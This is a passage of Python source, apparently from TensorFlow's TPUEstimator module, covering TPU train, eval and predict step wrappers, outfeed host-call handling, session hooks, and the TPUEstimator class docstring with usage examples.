def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(ops.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients,
training.get_global_step())
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = ops.get_default_graph()._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
ops.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
ops.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with ops.device(tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [control_flow_ops.cond(
math_ops.equal(math_ops.mod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: control_flow_ops.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
